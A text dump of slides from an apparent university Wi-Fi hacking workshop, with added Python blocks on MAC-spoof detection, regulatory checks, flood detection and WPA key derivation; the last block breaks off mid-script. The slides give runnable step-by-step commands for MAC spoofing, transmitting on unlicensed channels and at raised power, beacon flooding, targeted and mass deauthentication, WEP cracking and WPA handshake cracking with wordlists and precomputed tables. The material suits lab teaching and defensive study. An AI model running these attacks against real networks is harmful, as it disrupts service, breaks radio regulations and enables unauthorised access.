
1 ACM Wi-Fi Workshop Presented By: Chris Rawlings Brad Emge

2 Disclaimer By participating in this workshop you agree to be hacked for demonstration purposes only. Don't worry, no personal data will be collected or stored. Tools demonstrated in this panel are legitimate devices that comply with all the necessary rules and regulations and are used by Governments and Penetration testers to conduct lawful spying and security audits. The contents of this file are for educational purposes only. It is strongly suggested that you do not use this knowledge for illegal purposes.

3 Information All steps in this slide show were performed and tested on 32-bit Kali Linux version 1.0.6 with an Alfa AWUS036H USB wireless card (these are the operating system and wireless card you have in front of you). Any statement that begins with ‘#’ is a command to be typed in the terminal

4 What is Kali Linux Debian based Linux operating system Designed for the sole purpose of penetration testing, exploitation, and hacking

5 Booting into Kali Linux Start with computer off Plug in flash drive and USB wireless card Boot the computer off of the USB flash drive From YUMI select system tools then kali Select live (686-pae) from the boot menu

6 Post Kali Boot Make sure that your computer is not in “airplane” mode –Click applications  system tools  preferences  system settings  network –Make sure airplane mode is off –Close that window

7 Temporarily Connecting to The Internet Click the network icon in the upper right –Looks like two computers with a red circle and an X Select the MST-PSK-N network Make sure you are connecting with the non-Realtek wireless adapter Enter the password “JoeMiner”

8 Getting Necessary Files Open the terminal Type #wget http://tinyurl.com/acmwifiworkshopfiles Open root under the places menu Unzip the file and make sure the files are all in the root folder

9 Terms and Definitions Access Point(AP) Bandwidth Channel Evil Twin Frequency Honeypot IEEE 802.11

10 Terms and Definitions IP Address ISM Band MAC Address Modes of Wi-fi NIC Packet

11 Terms and Definitions Rainbow Table WEP Wi-Fi WPA WPA2 WPS

12 FINDING THE CORRECT WIRELESS CARD

13 Open the terminal

14 Type #airmon-ng

15 FINDING YOUR MAC ADDRESS

16 Type #ifconfig wlan1 ifconfig –program we are using wlan1 –interface we want information on

17 #ifconfig wlan1

18 CHANGING YOUR MAC ADDRESS

19 Type #ifconfig wlan1 down ifconfig –program that we are running wlan1 –interface we are operating on down –disable the interface

20 #ifconfig wlan1 down

21 Type #macchanger -m de:ad:be:ef:c0:fe wlan1 macchanger –program we are using -m –manually set the MAC address de:ad:be:ef:c0:fe –MAC address of your choice wlan1 –interface we are changing the MAC of

22 #macchanger -m de:ad:be:ef:c0:fe wlan1

23 Type #ifconfig wlan1 up ifconfig –program that we are running wlan1 –interface we are operating on up –enable the interface

24 #ifconfig wlan1 up

25 Type #ifconfig wlan1 ifconfig –program we are using wlan1 –interface we are interested in

26 #ifconfig wlan1

27 RANDOMLY CHANGING YOUR MAC ADDRESS

28 Type #ifconfig wlan1 down ifconfig –program that we are running wlan1 –interface we are operating on down –disable the interface

29 #ifconfig wlan1 down

30 Type #macchanger -r wlan1 macchanger –program we are using -r –random MAC address wlan1 –interface we are operating on

31 #macchanger -r wlan1

32 Type #ifconfig wlan1 up ifconfig –program we are using wlan1 –interface we are interested in up –enable the interface

33 #ifconfig wlan1 up

34 Type #ifconfig wlan1 ifconfig –the program we are using wlan1 –the interface we are interested in

35 #ifconfig wlan1

36 CHANGING YOUR MAC ADDRESS BACK TO ITS FACTORY SETTING

37 Type #ifconfig wlan1 down ifconfig –program that we are running wlan1 –interface we are operating on down –disable the interface

38 #ifconfig wlan1 down

39 Type #macchanger -p wlan1 macchanger –the program we are using -p –changes the MAC back to factory settings wlan1 –the interface we are operating on

40 #macchanger -p wlan1

41 Type #ifconfig wlan1 up ifconfig –program we are using wlan1 –interface we are interested in up –enable the interface

42 #ifconfig wlan1 up

43 Type #ifconfig wlan1 ifconfig –the program we are using wlan1 –the interface we are interested in

44 #ifconfig wlan1
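The three macchanger slides above set, randomise and restore the card's MAC address. As an added example (not part of the workshop material), the Python below shows the defender's side of that: it parses a MAC, reports its OUI and the two flag bits in the first octet, and flags an address whose locally-administered bit is set or whose OUI does not match the inventory. The factory and spoofed addresses are the ones quoted on the slides; `looks_spoofed` and its expected-OUI parameter are assumptions for the demonstration.

```python
import re


def parse_mac(text):
    """Return the six octets of a MAC address (':' or '-' separated) as bytes."""
    parts = re.split(r"[:-]", text.strip().lower())
    if len(parts) != 6 or not all(re.fullmatch(r"[0-9a-f]{2}", p) for p in parts):
        raise ValueError(f"not a MAC address: {text!r}")
    return bytes(int(p, 16) for p in parts)


def describe_mac(text):
    octets = parse_mac(text)
    first = octets[0]
    return {
        "mac": ":".join(f"{b:02x}" for b in octets),
        # First three octets are the OUI (vendor prefix); 00-C0-CA is the
        # prefix of the factory address quoted on the slides.
        "oui": "-".join(f"{b:02X}" for b in octets[:3]),
        # Bit 0 of the first octet: 0 = individual (unicast), 1 = group/multicast.
        "multicast": bool(first & 0x01),
        # Bit 1 of the first octet: 0 = globally unique (burned in),
        # 1 = locally administered, i.e. set by software such as macchanger.
        "locally_administered": bool(first & 0x02),
    }


def looks_spoofed(text, expected_oui=None):
    """Cheap inventory check (hypothetical helper): a locally-administered
    address, or an OUI that differs from what the asset record says this NIC
    should carry, is worth a second look. It is a signal, not proof."""
    info = describe_mac(text)
    if info["locally_administered"]:
        return True
    return expected_oui is not None and info["oui"] != expected_oui.upper()


FACTORY = "00:c0:ca:75:6f:ab"   # factory MAC of the workshop card (from the slides)
SPOOFED = "de:ad:be:ef:c0:fe"   # the address the slides set with macchanger -m

if __name__ == "__main__":
    for addr in (FACTORY, SPOOFED):
        info = describe_mac(addr)
        print(info, "suspicious" if looks_spoofed(addr, "00-C0-CA") else "matches inventory")
```

Note that 0xde has bit 1 set, so the slide's chosen address is locally administered by construction; modern phones that randomise their MAC set the same bit, so treat the flag as a prompt for correlation, not an alarm on its own.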

45 CHANGING THE CHANNEL OF YOUR WIRELESS CARD

46 type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are interested in

47 #iwconfig wlan1

48 type #iwconfig wlan1 channel c iwconfig –program we are using wlan1 –interface we are operating on channel –allows you to change the channel c –specific channel you wish to use 1,2,3…

49 #iwconfig wlan1 channel c

50 type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are interested in

51 #iwconfig wlan1

52 OPERATING OUTSIDE OF US REGULATION FREQUENCIES

53 type #iw reg get iw –program we are using reg –short for regulation get –show the iw regulation settings

54 #iw reg get

55 type #iw reg set JP iw –program we are using reg –short for regulation set –allows us to set the country regulation JP –country code for Japan; allows us to operate on channels 12, 13 and 14

56 #iw reg set JP

57 type #iw reg get iw –program we are using reg –short for regulation get –show the iw regulation settings

58 #iw reg get

59 Type #iwconfig wlan1 channel 14 iwconfig –program we are using wlan1 –interface we are operating on channel –allows us to set the channel 14 –channel we are setting

60 #iwconfig wlan1 channel 14

61 Type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are interested in

62 #iwconfig wlan1

63 CHANGING THE CHANNEL BACK TO A LEGAL FREQUENCY

64 type #iwconfig wlan1 channel c iwconfig –program we are using wlan1 –interface we are operating on channel –allows you to change the channel c –specific channel you wish to use 1,2,3…

65 #iwconfig wlan1 channel c

66 OPERATING YOUR WIRELESS CARD WITH MORE POWER

67 Type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are operating on

68 #iwconfig wlan1

69 Type #iw reg set BO iw –program we are using reg –short for regulation set –allows us to set the country regulation BO –country code for Bolivia

70 #iw reg set BO

71 Type #iwconfig wlan1 txpower 30 iwconfig –program we are using wlan1 –interface we are operating on txpower –stands for transmit power 30 –power output in dBm

72 #iwconfig wlan1 txpower 30

73 Type #iwconfig wlan1 iwconfig –program we are using wlan1 –interface we are operating on

74 #iwconfig wlan1

75 Note on Transmit Power The power output has increased from 0.1 W to 1 W (30 dBm). With our current equipment (Wi-Fi card and antenna) we will not be violating FCC regulation, however with a higher gain antenna we could be
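The channel and transmit-power slides above change two things the regulatory domain controls: which channels are usable and how much power may be radiated. The following is an added example, not code from the workshop: it converts a 2.4 GHz channel number to its centre frequency, checks it against a simplified US/JP channel table, converts dBm to watts (the 0.1 W to 1 W figure on the slide), and computes EIRP from transmit power plus antenna gain so you can see how a higher-gain antenna pushes the same 30 dBm over a limit. The channel table, the 36 dBm EIRP cap and the antenna gains in the demo are stated assumptions.

```python
# Simplified 2.4 GHz channel plan: channel n (1..13) sits at 2407 + 5*n MHz;
# channel 14 is the special case at 2484 MHz (Japan, 802.11b only).
def channel_to_mhz(channel):
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError(f"not a 2.4 GHz channel: {channel}")


# Assumed, simplified regulatory table for the two domains the slides switch
# between: US permits 1-11, JP permits 1-14. The real wireless-regdb also
# carries bandwidth and power rules; this is enough to show the check.
ALLOWED_CHANNELS = {"US": set(range(1, 12)), "JP": set(range(1, 15))}


def channel_allowed(regdomain, channel):
    return channel in ALLOWED_CHANNELS[regdomain.upper()]


def dbm_to_watts(dbm):
    """0 dBm is 1 mW; every 10 dB is a factor of ten."""
    return 10 ** (dbm / 10) / 1000


def eirp_dbm(tx_dbm, antenna_gain_dbi, cable_loss_db=0.0):
    """Effective isotropic radiated power: what the regulator actually limits,
    not the number iwconfig reports for the card alone."""
    return tx_dbm + antenna_gain_dbi - cable_loss_db


# Assumed figure: FCC Part 15.247 caps 2.4 GHz point-to-multipoint EIRP at
# 36 dBm (1 W conducted into a 6 dBi antenna).
FCC_EIRP_LIMIT_DBM = 36


def exceeds_fcc_limit(tx_dbm, antenna_gain_dbi, cable_loss_db=0.0):
    return eirp_dbm(tx_dbm, antenna_gain_dbi, cable_loss_db) > FCC_EIRP_LIMIT_DBM


if __name__ == "__main__":
    for ch in (1, 11, 14):
        print(ch, channel_to_mhz(ch), "MHz", "US" if channel_allowed("US", ch) else "--",
              "JP" if channel_allowed("JP", ch) else "--")
    print("20 dBm =", dbm_to_watts(20), "W; 30 dBm =", dbm_to_watts(30), "W")
    # Assumed antenna gains: a small stock dipole versus a higher-gain panel.
    for gain in (5, 9):
        print(f"30 dBm + {gain} dBi -> {eirp_dbm(30, gain)} dBm EIRP,",
              "over limit" if exceeds_fcc_limit(30, gain) else "within limit")
```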

76 FINDING THE MODES YOUR WIRELESS CARD SUPPORTS

77 Type #airmon-ng airmon-ng –program we are using

78 #airmon-ng

79 Type #iw phy phy0 info | grep -A3 modes iw –program we are using phy –select the device by its physical (phy) number phy0 –physical device number from airmon-ng info –give us the info about the phy0 device | grep –pipes the output into the program grep -A3 –print the 3 lines after each match of the search term modes –the term we are searching for with grep

80 #iw phy phy0 info | grep -A3 modes

81 Modes Supported IBSS –ad-hoc mode –computer to computer connection managed –allows you to connect to networks –your Wi-Fi card is usually in managed mode monitor –the wireless counterpart of promiscuous mode –allows you to view all 802.11 frames, including traffic not destined for your card

82 OPERATING YOUR CARD IN AD-HOC MODE

83 Type #ifconfig wlan1 down ifconfig –program that we are running wlan1 –interface we are operating on down –disable the interface

84 #ifconfig wlan1 down

85 Type #iwconfig wlan1 mode ad-hoc iwconfig –program we are using wlan1 –interface we are operating on mode –allows us to set a specific mode ad-hoc –the mode we will be using

86 #iwconfig wlan1 mode ad-hoc

87 Type #iwconfig wlan1 channel 1 iwconfig –program we are using wlan1 –interface we are operating on channel –allows us to change the channel 1 –specific channel we are using 1,2,3…

88 #iwconfig wlan1 channel 1

89 Type #iwconfig wlan1 essid ‘nameofnetwork’ iwconfig –program we are using wlan1 –interface we are operating on essid –allows us to set the network name ‘nameofnetwork’ –name of the network

90 #iwconfig wlan1 essid ‘nameofnetwork’

91 Type #iwconfig wlan1 key s:’password’ iwconfig –program we are using wlan1 –interface we are operating on key –allows us to operate a network with a WEP key –a WPA/WPA2 key is not possible (I think) s: –indicates the key entered is in ASCII ‘password’ –the key as an ASCII string

92 #iwconfig wlan1 key s:’password’

93 Type #ifconfig wlan1 up ifconfig –program we are using wlan1 –interface we are operating on up –enable the interface

94 #ifconfig wlan1 up

95 Type #iwconfig wlan1 iwconfig –the program we are using wlan1 –the interface we are operating on

96 #iwconfig wlan1

97 TURNING OFF AD-HOC MODE

98 type #iwconfig wlan1 mode managed iwconfig –program we are using wlan1 –interface we are operating on mode –allows us to change the mode of the adapter managed –sets managed mode

99 OPERATING YOUR CARD IN MONITOR MODE

100 type #airmon-ng start wlan1 airmon-ng –program we are using start –enables monitor mode wlan1 –interface we wish to enable monitor mode on

101 #airmon-ng start wlan1

102 type #kill 3018 & kill 3853 kill –command to stop programs from running 3018 –PID of process from slide before & –runs the first kill in the background and goes straight on to the second; kill 3018 3853 does the same thing in one command

103 #kill 3018 & kill 3853

104 type #iwconfig iwconfig –program we are using

105 #iwconfig

106 DATA GATHERING IN MONITOR MODE

107 type #tshark -i mon0 tshark –program we are using –terminal wireshark -i –interface mon0 –interface we are operating on

108 #tshark -i mon0

109

110 type ctrl-c ctrl-c –stops the running program

111 type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we wish to view wireless traffic on

112 #airodump-ng mon0

113

114 BSSID –MAC address of access point station –MAC address of connected client Probe –shows what access points a station is looking for

115 type ctrl-c ctrl-c –stops the running program

116 BEACON FLOODING

117 What are Beacons Management Frame in IEEE 802.11(Wi-Fi) Transmitted to announce the presence of a network Includes information such as the name, the channel, supported data speeds, whether or not it is encrypted, etc.

118 type #nano ssidlist nano –text editor I am using –you may use something else if you prefer ssidlist –filename for the text file that will contain the SSIDs we will be broadcasting

119 #nano ssidlist

120 type different network names on separate lines

121 type ctrl-x, y, enter This saves the file in nano you could also write out the file and then exit this may be different if you didn’t use nano

122 type #mdk3 mon0 b -f ssidlist mdk3 –program we are using mon0 –interface we are operating on b –means to send out beacon frames -f –read the network names to broadcast from a file ssidlist –text file with the network names in it

123 #mdk3 mon0 b -f ssidlist

124

125 type ctrl-c to stop stops the running program

126 VIEWING PROBE REQUESTS

127 What are Probe Requests Management Frame in IEEE 802.11 (Wi-Fi) A packet sent from a client (computer, phone, etc.) to see if a network is within range Your devices are constantly sending out Probe Requests and we can view them (also exploit them, but that’s later)

128 type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are operating on

129 #airodump-ng mon0 In a very dense Wi-Fi environment, we will be unable to see the probe requests at first to fix this –zoom out available from the view menu –stop the program with ctrl-c –zoom in available from the view menu

130 #airodump-ng mon0

131 PASSIVE NETWORK SCAN

132 Type #iw dev wlan1 scan passive | grep SSID iw –program we are using dev –indicates that we are identifying our Wi-Fi card by device number and not physical number wlan1 –interface we wish to scan on passive –indicates that no packets should be sent | grep –program that is used to search the output SSID –the word that grep will be searching for

133 #iw dev wlan1 scan passive | grep SSID

134 ACTIVE NETWORK SCAN

135 Type #iwlist wlan1 scan | grep ESSID iwlist –program we are using wlan1 –interface we are scanning on scan –indicates we wish to scan |grep –program used to search the output of iwlist ESSID –the word we are searching for with grep

136 #iwlist wlan1 scan | grep ESSID

137 DEAUTHENTICATION

138 What is Deauthentication Management Frame in IEEE 802.11 (Wi-Fi) Allows clients to be kicked off of a wireless access point These occur naturally in wireless traffic and users do not even notice them We can send excessive amounts of these packets to prevent a client from connecting
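Both the beacon-flooding slides and the deauthentication slides describe management-frame floods that a wireless IDS can spot because they look nothing like the occasional legitimate frame. The detector below is an added example, not part of the workshop material: it walks a constructed, time-ordered frame list shaped like `tshark -T fields` output (relative time, 802.11 management subtype, source, destination, BSSID, SSID), keeps a one-second sliding window, and raises one alert for a deauth burst aimed at a single client and one for a burst of beacons from BSSIDs that are not in the known-AP list. The AP, client and SSID values are the ones quoted on the slides; the fake BSSIDs, the window and the thresholds are assumptions.

```python
from collections import defaultdict, deque

AP = "00:1a:c4:51:3c:31"        # access point MAC quoted on the slides
CLIENT = "d4:20:6d:41:78:b2"    # client MAC quoted on the slides
BCAST = "ff:ff:ff:ff:ff:ff"
BEACON, DEAUTH = 8, 12          # 802.11 management frame subtype values


def constructed_capture():
    """Constructed sample: normal beacons, one routine deauth, then a deauth
    burst against CLIENT and a beacon flood from eight made-up BSSIDs."""
    rows = []
    for i in range(3):                                  # beacons ~102 ms apart
        rows.append((i * 0.1024, BEACON, AP, BCAST, AP, "MST-PSK-N"))
    rows.append((0.150, DEAUTH, AP, CLIENT, AP, ""))    # a single, normal deauth
    for i in range(12):                                 # 12 deauths in 110 ms
        rows.append((2.0 + i * 0.01, DEAUTH, AP, CLIENT, AP, ""))
    for i in range(8):                                  # fresh BSSID every 20 ms
        fake = f"02:00:00:00:00:{i:02x}"               # constructed, not real
        rows.append((3.0 + i * 0.02, BEACON, fake, BCAST, fake, f"Free WiFi {i}"))
    return rows


def detect(frames, known_aps, window=1.0, deauth_limit=5, new_bssid_limit=5):
    """frames: iterable of (time_s, subtype, sa, da, bssid, ssid) in time order.
    Returns a list of (kind, key, time) alerts; each key fires at most once."""
    alerts, fired = [], set()
    deauths = defaultdict(deque)   # (sa, da) -> times of deauths in the window
    unknown_beacons = deque()      # (time, bssid) of beacons from unknown APs
    for t, subtype, sa, da, bssid, ssid in frames:
        if subtype == DEAUTH:
            q = deauths[(sa, da)]
            q.append(t)
            while q and t - q[0] > window:        # drop frames older than window
                q.popleft()
            if len(q) > deauth_limit and ("deauth", sa, da) not in fired:
                fired.add(("deauth", sa, da))
                alerts.append(("deauth_flood", (sa, da), t))
        elif subtype == BEACON and bssid not in known_aps:
            unknown_beacons.append((t, bssid))
            while unknown_beacons and t - unknown_beacons[0][0] > window:
                unknown_beacons.popleft()
            distinct = {b for _, b in unknown_beacons}
            if len(distinct) > new_bssid_limit and "beacon" not in fired:
                fired.add("beacon")
                alerts.append(("beacon_flood", tuple(sorted(distinct)), t))
    return alerts


if __name__ == "__main__":
    for kind, key, t in detect(constructed_capture(), known_aps={AP}):
        print(f"{t:7.3f}s  {kind}  {key}")
```

The single deauth at 0.150 s never trips the counter, which is the point: rate and fan-out, not the mere presence of a deauth frame, separate normal roaming from an attack.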

139 DEAUTHENTICATION DIRECTED AT A PARTICULAR CLIENT

140 Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are operating on

141 #airodump-ng mon0

142 type ctrl-c when you have finished finding your target

143 Type #iwconfig mon0 channel 11 iwconfig –program we are using mon0 –interface we are changing the channel of channel –indicates we are changing the channel 11 –channel we are changing to

144 #iwconfig mon0 channel 11

145 Type #aireplay-ng --ignore-negative-one -0 10 -a 00:1a:c4:51:3c:31 -c d4:20:6d:41:78:b2 mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –you may be able to get it to work without this -0 –indicates deauthentication packet 10 –number of deauths to send -a 00:1a:c4:51:3c:31 –access point MAC address -c d4:20:6d:41:78:b2 –client MAC address mon0 –interface to send deauth packets out on

146 #aireplay-ng --ignore-negative-one -0 10 -a 00:1a:c4:51:3c:31 -c d4:20:6d:41:78:b2 mon0

147 DEAUTHENTICATION DIRECTED TOWARD A SPECIFIC NETWORK

148 Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using

149 #airodump-ng mon0

150 type ctrl-c when you have finished finding your target

151 Type #iwconfig mon0 channel 11 iwconfig –program we are using mon0 –interface we are changing the channel of channel –indicates we are changing the channel 11 –channel we are changing to

152 #iwconfig mon0 channel 11

153 Type #nano blacklist nano –text editor we are using –you may use something else if you prefer blacklist –name of the text file we are editing

154 #nano blacklist

155

156 Separate MAC addresses by putting them on separate lines. In this case we are only targeting a single Access Point Type ctrl-x, y, enter –this saves the file

157 Type #mdk3 mon0 d -b blacklist -c 11 mdk3 –program we are using mon0 –interface we are deauthenticating from d –indicates deauthentication packets are to be sent -b –indicates that we are using a blacklist. We want to attack the indicated access points blacklist –file that has the list of MAC addresses to deauth -c –indicates what channel to use 11 –channel the access points are operating on

158 #mdk3 mon0 d -b blacklist -c 11

159 type ctrl-c to stop the program

160 DEAUTHENTICATION DIRECTED TOWARD MULTIPLE NETWORKS

161 Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using

162 #airodump-ng mon0

163 Type #nano blacklist nano –text editor we are using –you may use something else if you prefer blacklist –name of the text file we are editing

164 #nano blacklist

165

166 Separate MAC addresses by putting them on separate lines. In this case we are targeting access points on more than one channel Type ctrl-x, y, enter –this saves the file

167 Type #mdk3 mon0 d -b blacklist -c 6,11 mdk3 –program we are using mon0 –interface we are deauthenticating from d –indicates deauthentication packets are to be sent -b –indicates that we are using a blacklist. We want to attack the indicated access points blacklist –file that has the list of MAC addresses to deauth -c –indicates what channels to use 6,11 –channels the access points are operating on

168 #mdk3 mon0 d -b blacklist -c 6,11

169 type ctrl-c to stop the program

170 CLIENTS FORCED TO CONNECT TO A SPECIFIC ACCESS POINT

171 Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are operating on

172 #airodump-ng mon0

173 type ctrl-c when done finding the access point to wish for clients to connect to

174 Type #nano whitelist nano –text editor we are using –you may use something else if you prefer whitelist –text file with the list of MAC addresses of the access points you want clients to be able to connect to

175 #nano whitelist

176

177 note that it is possible to enter multiple MAC addresses in this file as well type ctrl-x, y, enter when finished

178 Type #mdk3 mon0 d -w whitelist mdk3 –program we are using mon0 –interface to send deauth packets from d –indicates to deauthenticate clients -w –indicates we are whitelisting specific access points whitelist –text file that contains the MAC address of the AP we want clients to connect to –deauths all APs other than those on this list

179 #mdk3 mon0 d -w whitelist

180 type ctrl-c when done sending deauth packets

181 BREAKING ENCRYPTION

182 BREAKING WEP ENCRYPTION

183 Breaking WEP Encryption

184 Steps –Identify network –Begin collecting data –Cause extra data to be generated (optional; you will not want to do this if conducting a passive attack) –Start cracking once the number of Initialization Vectors (IVs) reaches 50,000

185 Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are operating on

186 #airodump-ng mon0

187 Notice that in the ENC column it says WEP. Any WEP encrypted access point is vulnerable. type ctrl-c when you have finished finding your target

188 #airodump-ng mon0

189

190 Breaking WEP Encryption open a new tab in the terminal window file  new tab

191 Type #aireplay-ng --ignore-negative-one -1 0 -a 12:18:0a:21:ae:e4 -h 00:c0:ca:75:6f:ab mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –this may not be needed -1 0 –fake authentication: associates with the Access Point (0 is the reassociation delay in seconds) -a 12:18:0a:21:ae:e4 –MAC address of the AP -h 00:c0:ca:75:6f:ab –source MAC address, i.e. the MAC of our wireless card mon0 –interface we are operating on

192 #aireplay-ng --ignore-negative-one -1 0 -a 12:18:0a:21:ae:e4 -h 00:c0:ca:75:6f:ab mon0

193 Type #aireplay-ng --ignore-negative-one -3 -b 12:18:0a:21:ae:e4 -h 00:c0:ca:75:6f:ab mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –this may not be needed -3 –ARP Request Replay Attack –most effective way to generate new IVs -b 12:18:0a:21:ae:e4 –MAC address of the AP -h 00:c0:ca:75:6f:ab –source MAC address, i.e. the MAC of our wireless card mon0 –interface we are operating on

194 #aireplay-ng --ignore-negative-one -3 -b 12:18:0a:21:ae:e4 -h 00:c0:ca:75:6f:ab mon0

195 Breaking WEP Encryption Go back to the first tab and wait until the number in the data column >50000 This number is not set since the attack we are doing is based upon statistics. Sometimes you can break it with half as many and sometimes you need twice as many or more. The length of the key also contributes to the number of IVs that are needed

196 Breaking WEP Encryption

197 Open a new tab in the terminal

198 Type #aircrack-ng -b 12:18:0a:21:ae:e4 acm_wep-01.cap aircrack-ng –program we are using -b 12:18:0a:21:ae:e4 –the MAC address of the target Access Point acm_wep-01.cap –the capture file written by airodump-ng, containing the collected IVs

199 #aircrack-ng -b 12:18:0a:21:ae:e4 acm_wep-01.cap

200 If you are not successful wait until the number captured increases to the suggested number and then try again

201 #aircrack-ng -b 12:18:0a:21:ae:e4 acm_wep-01.cap

202 If successful, you will see the image previous. Go back to the other two tabs and stop the running programs using ctrl-c

203 BREAKING WPA&WPA2 ENCRYPTION

204 Breaking WPA&WPA2 Encryption What makes WPA&WPA2 more difficult to break into? –larger key –does not use RC4 –uses the network name (SSID) as well as the password to compute the key

205 Breaking WPA&WPA2 Encryption No shortcut like in breaking WEP Must brute force the key Hope that it is a dictionary word or something very simple such as ten numbers Three networks set up for breaking into –dictionary password –8-char alphanumeric –random

206 Breaking WPA&WPA2 Encryption Process –Begin listening to the packets on that network –Capture the 4-way handshake between AP and client; this can be done passively or by deauthentication –Take that captured handshake and try different sources of passwords to break it –Wait and see

207 BREAKING WPA WITH A DICTIONARY LIST

208 Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using to listen on

209 #airodump-ng mon0

210 After finding the target network type ctrl-c to stop running the program

211 Type #airodump-ng -c 11 --bssid 00:1a:c4:51:3c:31 -w acm_dictionary mon0 airodump-ng –program we are using -c 11 –says to listen on channel 11 --bssid 00:1a:c4:51:3c:31 –listen for traffic to and from this Access Point -w acm_dictionary –file prefix to save the data to mon0 –interface we are listening on

212 #airodump-ng -c 11 --bssid 00:1a:c4:51:3c:31 -w acm_dictionary mon0

213

214 The previous image shows connected clients to the specific access point At this point you could wait for the handshake to occur or you could force it to occur by means of deauth

215 Breaking WPA&WPA2 encryption Open a new tab in terminal This can be done by going to file  new tab

216 Type #iwconfig mon0 channel 11 iwconfig –program we are using mon0 –interface we are operating on channel –allows us to change the channel 11 –specific channel we are changing the interface to

217 #iwconfig mon0 channel 11

218 Type #aireplay-ng --ignore-negative-one -0 10 -a 00:1a:c4:51:3c:31 -c d4:20:6d:41:78:c9 mon0 aireplay-ng –program we are using --ignore-negative-one –needed because of a potential driver issue –you may be able to get it to work without this -0 –indicates deauthentication packet 10 –number of deauths to send -a 00:1a:c4:51:3c:31 –access point MAC address -c d4:20:6d:41:78:c9 –client MAC address mon0 –interface to send deauth packets out on

219 #aireplay-ng --ignore-negative-one -0 10 -a 00:1a:c4:51:3c:31 -c d4:20:6d:41:78:c9 mon0

220 #aireplay-ng --ignore-negative-one -0 10 -a 00:1a:c4:51:3c:31 -c d4:20:6d:41:78:c9 mon0

221 Breaking WPA&WPA2 encryption Go back to the first tab and you should see an image similar to the following The WPA handshake in the top must be there to proceed

222 #airodump-ng -c 11 --bssid 00:1a:c4:51:3c:31 -w acm_dictionary mon0

223 Breaking WPA&WPA2 encryption Make sure the dictionary files that you downloaded earlier are in the same folder as your .cap files. This should be in the root directory We will be demonstrating using the english.txt file, however feel free to experiment with the others

224 Type #aircrack-ng acm_dictionary-01.cap -w english.txt aircrack-ng –program we are using to crack the key acm_dictionary-01.cap –network capture file with the handshake in it -w –indicates that a word list is to be used english.txt –the file name containing the wordlist

225 #aircrack-ng acm_dictionary-01.cap -w english.txt

226 If not successful that means that the password was not in that list of words You could try using a larger word list or begin brute forcing to break the password If successful you should see the following

227 #aircrack-ng acm_dictionary-01.cap -w english.txt

228 BREAKING WPA&WPA2 USING A RAINBOW TABLE

229 What is a Rainbow Table pre-computed table of hashed values they are built for a specific SSID (network name) built using a dictionary or some other source of passwords Takes a long time to compute and is a very large file –Usually done on a very powerful computer The rainbow table can then be used to quickly find a password

230 Breaking WPA&WPA2 using a Rainbow Table Because we already have the handshake, we do not need to re-capture it. We will be using the same .cap file as the previous example

231 Breaking WPA&WPA2 encryption Make sure the rainbow table that you downloaded earlier is in the same folder as your .cap files. This should be in the root directory We will be demonstrating using the acm_dictionary_hash file This file was created from the english.txt dictionary file specifically for this SSID

232 Type #cowpatty -r acm_dictionary-01.cap -d acm_dictionary_hash -s acm_dictionary cowpatty –program we are using -r acm_dictionary-01.cap –the file that has the four-way handshake in it -d acm_dictionary_hash –the file of pre-computed hashes for this specific SSID -s acm_dictionary –telling cowpatty what the name of the network is

233 #cowpatty -r acm_dictionary-01.cap -d acm_dictionary_hash -s acm_dictionary

234 If the password was not in the source file used to generate the rainbow table then this technique will fail and you’ll either have to try the dictionary attack, make a new rainbow table, or brute force the password If successful, you will see the following image

235 #cowpatty -r acm_dictionary-01.cap -d acm_dictionary_hash -s acm_dictionary

236 COMPUTING A PERSONALIZED RAINBOW TABLE

237 Computing a personalized rainbow table As this is very time consuming, it is usually only done for very common SSID names such as netgear, linksys, etc This is also used when you know the network name in advance and wish to prepare for the attack on the network

238 Type #airodump-ng mon0 airodump-ng –program we are using mon0 –interface we are using to listen on

239 #airodump-ng mon0

240 After finding the target network type ctrl-c to stop running the program

241 Type #genpmk -f english.txt -d acm_dictionary_hash -s acm_dictionary genpmk –the program we are using -f english.txt –the file serving as the source of passwords -d acm_dictionary_hash –what the rainbow table should be saved as -s acm_dictionary –telling genpmk what the SSID is so that it can be hashed appropriately

242 #genpmk -f english.txt -d acm_dictionary_hash -s acm_dictionary
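The rainbow-table slides and the genpmk slide both rest on one fact: the WPA/WPA2-Personal pairwise master key is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 rounds, 32 bytes out. The example below is added here and is not code from the workshop or from the genpmk/cowpatty projects: it derives the PMK with Python's standard library, checks it against the published IEEE 802.11i test vector, and shows with a constructed four-word list why a table built for the SSID acm_dictionary is useless against any other SSID. That SSID salting, together with the 4096 iterations, is the defence an operator gets for free by not using a common network name.

```python
import hashlib


def wpa_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes),
    as specified for WPA/WPA2-Personal (IEEE 802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def build_pmk_table(words, ssid):
    """What genpmk precomputes: one PMK per candidate passphrase, bound to one SSID."""
    return {wpa_pmk(w, ssid): w for w in words}


def lookup(table, pmk):
    """Return the passphrase behind a PMK, or None if the table does not cover it."""
    return table.get(pmk)


# Constructed stand-in for english.txt; a real list would be far longer.
WORDS = ["letmein", "password", "workshop", "correcthorse"]

# Published test vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
IEEE_VECTOR = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

if __name__ == "__main__":
    print("test vector ok:", wpa_pmk("password", "IEEE").hex() == IEEE_VECTOR)
    table = build_pmk_table(WORDS, "acm_dictionary")
    # Same passphrase, the workshop SSID: the precomputed table finds it.
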